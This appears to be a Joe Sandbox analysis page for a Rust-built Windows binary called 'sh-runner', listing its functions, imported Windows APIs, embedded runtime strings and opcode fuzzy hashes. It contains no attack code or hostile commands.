Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$FileModule32UnmapView$CreateFirstNextSnapshotToolhelp32memset
String ID:
API String ID: 2278125577-0
Opcode ID: 28d50c083199d7b79e8ccba0a691a97b968bba2aeb9e0effe2039b9cf07b3eca
Instruction ID: 416ed0648cf30c93d72d584c1edaceab4ecd9d16497667e64b2ed1ace2ced9c1
Opcode Fuzzy Hash: 28d50c083199d7b79e8ccba0a691a97b968bba2aeb9e0effe2039b9cf07b3eca
Instruction Fuzzy Hash: 7DE18662A08BC18AEB74AF29DC403F86360FB45798F848135CF5D1B7A6DF3896858724

Function 00007FF72BD4B650 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF72BD4B67E
memset.MSVCRT ref: 00007FF72BD4B962
memcpy.MSVCRT ref: 00007FF72BD4B974

Strings

0, xrefs: 00007FF72BD4B69D
FFFFFFFF, xrefs: 00007FF72BD4B7D1
., xrefs: 00007FF72BD4B6F0

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memset$memcpy
String ID: .$0$FFFFFFFF
API String ID: 368790112-1041323599
Opcode ID: baf29033d4d66bb504d8d70b18f9e37c5236a394ab28e28df84039c56d65a7ed
Instruction ID: 55386173a11bf6415a40b6fe485fdfd67060d12ffe78e28ad46d2f2b0ec598e8
Opcode Fuzzy Hash: baf29033d4d66bb504d8d70b18f9e37c5236a394ab28e28df84039c56d65a7ed
Instruction Fuzzy Hash: DE913726F0868545FB6DEA3989103FCB7A2EF647A0FC44275CA5E066E4DE3C95458B20

Function 00007FF72BD153E0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 379windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF72BD15418
FormatMessageW.KERNEL32(?,?,00000000,?,?,00007FF72BCFBA63), ref: 00007FF72BD15478
GetLastError.KERNEL32(?,?,00000000,?,?,00007FF72BCFBA63), ref: 00007FF72BD15511

Strings

NTDLL.DLL, xrefs: 00007FF72BD1542A
assertion failed: self.is_char_boundary(new_len)/rustc/6c6d210089e4589afee37271862b9f88ba1d7755\library\alloc\src\string.rs, xrefs: 00007FF72BD156FC

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorFormatLastMessagememset
String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/6c6d210089e4589afee37271862b9f88ba1d7755\library\alloc\src\string.rs
API String ID: 3213201652-2508141481
Opcode ID: 15b56ef2df47a49a81f97455f74a7d1bccd05b7fa48a8e2239cd1947ab695685
Instruction ID: 861ac6d5f3ba63167b566fbbdf88eba29b4321ec4ab6ab2b68ca4a43c475747f
Opcode Fuzzy Hash: 15b56ef2df47a49a81f97455f74a7d1bccd05b7fa48a8e2239cd1947ab695685
Instruction Fuzzy Hash: 6DF1A622A19A9284FB29AF29DC007FCA761FB44788FC45035DE4D16BA6DF3CE645C760

Function 00007FF72BD162C0 Relevance: 7.9, APIs: 5, Instructions: 446COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF72BD16320
ProcessPrng.BCRYPTPRIMITIVES ref: 00007FF72BD1634C

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Process$CurrentPrng
String ID:
API String ID: 716580790-0
Opcode ID: 48505d29cadf61b442a691ef46f0850358945b65c0925643658045a632c3b598
Instruction ID: dbc602f558856f6b1f96d4c129ae14e0178af0166e852bda8e8131ee4d90a40f
Opcode Fuzzy Hash: 48505d29cadf61b442a691ef46f0850358945b65c0925643658045a632c3b598
Instruction Fuzzy Hash: 6202F276A18A928AE718AF39D8003F96BA0FB84798F845235EE5D477E9DF3CD041C710

Function 00007FF72BD13F70 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 336COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BD141B4

Strings

-pty, xrefs: 00007FF72BD14493, 00007FF72BD144C8
msys, xrefs: 00007FF72BD14479
cygw, xrefs: 00007FF72BD144E8
win-, xrefs: 00007FF72BD144EF

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpy
String ID: -pty$cygw$msys$win-
API String ID: 3510742995-1440016460
Opcode ID: 8d5a90feb98a6630309fbdfd4e35c81d7eac242735bce145a859c3383cf256e7
Instruction ID: 5c2f083e9e8575ce6e809f8ba1e4ca159411cd95f7af1f98fecf903272021eb9
Opcode Fuzzy Hash: 8d5a90feb98a6630309fbdfd4e35c81d7eac242735bce145a859c3383cf256e7
Instruction Fuzzy Hash: 47D13562A187C289F774AA78DC513F96790EB54388F889134DA494BBD9CF3CE181CF10

Function 00007FF72BD6AF00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF72BD6B250
Unknown pseudo relocation bit size %d., xrefs: 00007FF72BD6B244
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF72BD6B08D

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 79d3606074c03acd7ee10fa2614d67ca7db49e16cf856c305e6923568db78f53
Instruction ID: fac3ea5e36abb59e996ec84f03ad92f5ad1e40a49239ddbda4ce85ad4eb3278c
Opcode Fuzzy Hash: 79d3606074c03acd7ee10fa2614d67ca7db49e16cf856c305e6923568db78f53
Instruction Fuzzy Hash: C491B622E09D1741EB18AB28AC413F9A790FF5D764F948239DD6C177E4DE3CE8428E20

Function 00007FF72BD1CDB0 Relevance: 6.3, APIs: 4, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127d2e710b2fbb2dad025b4d010958ea53573c618a6973f67377dc73af12a754
Instruction ID: 90f097fd5e8aad4a0da4df4dbaaef056357ca2c0a38eec89f94e2153f5fdc526
Opcode Fuzzy Hash: 127d2e710b2fbb2dad025b4d010958ea53573c618a6973f67377dc73af12a754
Instruction Fuzzy Hash: 4AA1D362B2965581EB1CBA2A9C047F9A260FB89BD4F885531DD1D077E5DF3CE082DB20

Function 00007FF72BD22A06 Relevance: 6.1, APIs: 4, Instructions: 87networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FF72BD22ADE
listen.WS2_32 ref: 00007FF72BD22AF0
WSAGetLastError.WS2_32 ref: 00007FF72BD22B01
closesocket.WS2_32 ref: 00007FF72BD22B13

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLastbindclosesocketlisten
String ID:
API String ID: 2544828312-0
Opcode ID: 748ffb5efd0f39301a13475b86eb4fa1a00e22ed55c28eb2b7083ec44f07c07c
Instruction ID: 6c682cc32a6a0730e9a1ce1f9248378987bbb0ca122ed1a152042aa0d750f290
Opcode Fuzzy Hash: 748ffb5efd0f39301a13475b86eb4fa1a00e22ed55c28eb2b7083ec44f07c07c
Instruction Fuzzy Hash: 13313B61F0858146F71CBA6A9A413FDA260EF45BC0F848034EE5C57BE6EF2CF5918B20

Function 00007FF72BCFF9B0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 353COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BCFFABB

Part of subcall function 00007FF72BD6A710: RtlCaptureContext.KERNEL32 ref: 00007FF72BD6A78E
Part of subcall function 00007FF72BD6A710: RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A7AC
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7B2
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7D0

Strings

lock count overflow in reentrant mutexstd\src\sync\reentrant_lock.rs, xrefs: 00007FF72BCFFADC
StderrLock, xrefs: 00007FF72BCFFE7B

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: abort$AddressCaptureContextSingleUnwindWake
String ID: StderrLock$lock count overflow in reentrant mutexstd\src\sync\reentrant_lock.rs
API String ID: 3509065391-214416337
Opcode ID: c9917dc30047bce30c834a4958dfc760e7842858597a52e663ac847d41f4f166
Instruction ID: f6ef3815b5a5321a90996147bf93b78f52ad5e00536aebd14a1cebbcbf2a877b
Opcode Fuzzy Hash: c9917dc30047bce30c834a4958dfc760e7842858597a52e663ac847d41f4f166
Instruction Fuzzy Hash: 2BD1C622B0564186EB18EB2DDC503FDA360EB457A4F948636DE6E437E5DF3CE5828B10

Function 00007FF72BD10020 Relevance: 4.6, APIs: 3, Instructions: 90filenativeCOMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL ref: 00007FF72BD100D3
NtOpenFile.NTDLL ref: 00007FF72BD10122
RtlNtStatusToDosError.NTDLL ref: 00007FF72BD1013A

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorStatus$FileOpen
String ID:
API String ID: 333864751-0
Opcode ID: 79e08d285390066f8c8e3106afc9c2b34007a1b195c426809136ab7f48f4070f
Instruction ID: 08571d1a5a9923f7d758a9b9b7a831982c97ba9863c920b88ec84e81a9fae4c8
Opcode Fuzzy Hash: 79e08d285390066f8c8e3106afc9c2b34007a1b195c426809136ab7f48f4070f
Instruction Fuzzy Hash: 76417231E14A8189F724AF78E8403ED77B0EB58358F945539DA8C97664DF3CA1C58B50

Function 00007FF72BD22D7C Relevance: 4.6, APIs: 3, Instructions: 80networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FF72BD22E4E
WSAGetLastError.WS2_32 ref: 00007FF72BD22E5F
closesocket.WS2_32 ref: 00007FF72BD22E71

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLastbindclosesocket
String ID:
API String ID: 698480664-0
Opcode ID: 4eb87b05c24c358b8626dbfb7c6a5281964d59a7c7398afb91b3523ab9e7afe7
Instruction ID: 62c7c376e936d09d6f672c251ff9fc5f0795dbc025ca95f41abe57ad53a84bda
Opcode Fuzzy Hash: 4eb87b05c24c358b8626dbfb7c6a5281964d59a7c7398afb91b3523ab9e7afe7
Instruction Fuzzy Hash: 7C21FC61B0459146F71CE76A9A403FDA261EF19BC0F848034EE4C57BA6EF2CF5D19B20

Function 00007FF72BD0B2C0 Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32 ref: 00007FF72BD0B2DE

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: daafc790f6fc2ab17385ebeccc3584105375b97aa96ea286096787869a2030ce
Instruction ID: 1c8dcb9110cb354ea5630e7354890f0947158d3df2784ecbf61cc5c52d10322a
Opcode Fuzzy Hash: daafc790f6fc2ab17385ebeccc3584105375b97aa96ea286096787869a2030ce
Instruction Fuzzy Hash: 57F02BB7B20A549AEF18EF79E9043A8A7659788BC4F00C0318F5D8BB68EF34C150C300

Function 00007FF72BD0C420 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00007FF72BD0C42A

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: cf75c0701d8c260c657b1e56a6b0707c8d967c953aea0b40d83ec687e36a79fd
Instruction ID: ab3185834b99118c2cebcb061e3a36ed1ece90cd03350f797b950bbdd8a54d47
Opcode Fuzzy Hash: cf75c0701d8c260c657b1e56a6b0707c8d967c953aea0b40d83ec687e36a79fd
Instruction Fuzzy Hash: F6C09B11F6484ADDF73D71755D461F58258EB9C304FDC1430D6AC445A69D0DE9EB8D30

Function 00007FF72BD1F1B0 Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF72BD1F181

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c20e518f1d37e1e12e5e670489950399516bf17debc5f331c8f703646b1520c4
Instruction ID: f272a2871f74fdbc5a836e12d867371eff3b9fe6d98c9c913b10c13864c0c434
Opcode Fuzzy Hash: c20e518f1d37e1e12e5e670489950399516bf17debc5f331c8f703646b1520c4
Instruction Fuzzy Hash: 66F0D613F1998189FB6D666A6C001F4A694EF88B90F5C4039CE5C433A1ED2CE4C18F20

Function 00007FF72BD08FE0 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 272synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD09062
CloseHandle.KERNEL32 ref: 00007FF72BD09144
WaitForSingleObject.KERNEL32 ref: 00007FF72BD09151
GetLastError.KERNEL32 ref: 00007FF72BD0915A
CloseHandle.KERNEL32 ref: 00007FF72BD091D9
CloseHandle.KERNEL32 ref: 00007FF72BD091E2
CloseHandle.KERNEL32 ref: 00007FF72BD092D9
CloseHandle.KERNEL32 ref: 00007FF72BD0931F
CloseHandle.KERNEL32 ref: 00007FF72BD09328

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF72BD090E5, 00007FF72BD0923E, 00007FF72BD0926C

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$ErrorLastObjectSingleWait
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 1454876536-2333694755
Opcode ID: 8d72f280f28c7bcd1a6a19a771e24cadde8face6f91cd2850add88366a434be2
Instruction ID: 635bd5e426bf1d48f27d9a938f2be0f56210979f65ab8562e4904e88f4c51a91
Opcode Fuzzy Hash: 8d72f280f28c7bcd1a6a19a771e24cadde8face6f91cd2850add88366a434be2
Instruction Fuzzy Hash: A6C16E32A04A8295EB18EF69EC403ED6760FB58798F844435EE4D17BA9DF3CE581C760

Function 00007FF72BD3556F Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 105COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF72BD355D3
memcmp.MSVCRT ref: 00007FF72BD355ED
memcmp.MSVCRT ref: 00007FF72BD35607
memcmp.MSVCRT ref: 00007FF72BD35621
memcmp.MSVCRT ref: 00007FF72BD3563B
memcmp.MSVCRT ref: 00007FF72BD35655
memcmp.MSVCRT ref: 00007FF72BD3566F
memcmp.MSVCRT ref: 00007FF72BD35689

Strings

wR12, xrefs: 00007FF72BD3558A
SPSR, xrefs: 00007FF72BD355BA
wR13, xrefs: 00007FF72BD35596
wR10, xrefs: 00007FF72BD35572
ACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL0TPIDR_EL1TPIDR_EL2, xrefs: 00007FF72BD355C6
wR14, xrefs: 00007FF72BD355A2
wR15, xrefs: 00007FF72BD355AE
wR11, xrefs: 00007FF72BD3557E

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcmp
String ID: ACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL0TPIDR_EL1TPIDR_EL2$SPSR$wR10$wR11$wR12$wR13$wR14$wR15
API String ID: 1475443563-3862453883
Opcode ID: 7ce6a9613217053c9b0857ffd9cb691f60a9864dba60bba95da8cc9f52eb8788
Instruction ID: d1163283dd768cd23532c77f36215491f452a11c57d455586e6a1ba5be03fc28
Opcode Fuzzy Hash: 7ce6a9613217053c9b0857ffd9cb691f60a9864dba60bba95da8cc9f52eb8788
Instruction Fuzzy Hash: D9414851A0C24395FA2CBE1D9D401FC9662DF19784A88043ACE4F866B7CE3CF5499FA6

